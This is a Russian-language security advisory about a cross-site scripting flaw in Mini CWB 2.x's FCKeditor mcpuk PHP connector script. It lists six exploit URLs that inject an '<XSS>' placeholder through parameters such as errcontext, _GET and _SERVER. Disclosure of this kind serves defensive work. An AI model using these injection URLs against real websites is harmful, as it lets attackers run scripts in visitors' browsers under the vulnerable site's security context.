Программа: Mini CWB 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием /javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?errcontext=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_GET=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_POST=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_SESSION=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?_SERVER=<XSS>
http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/ browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии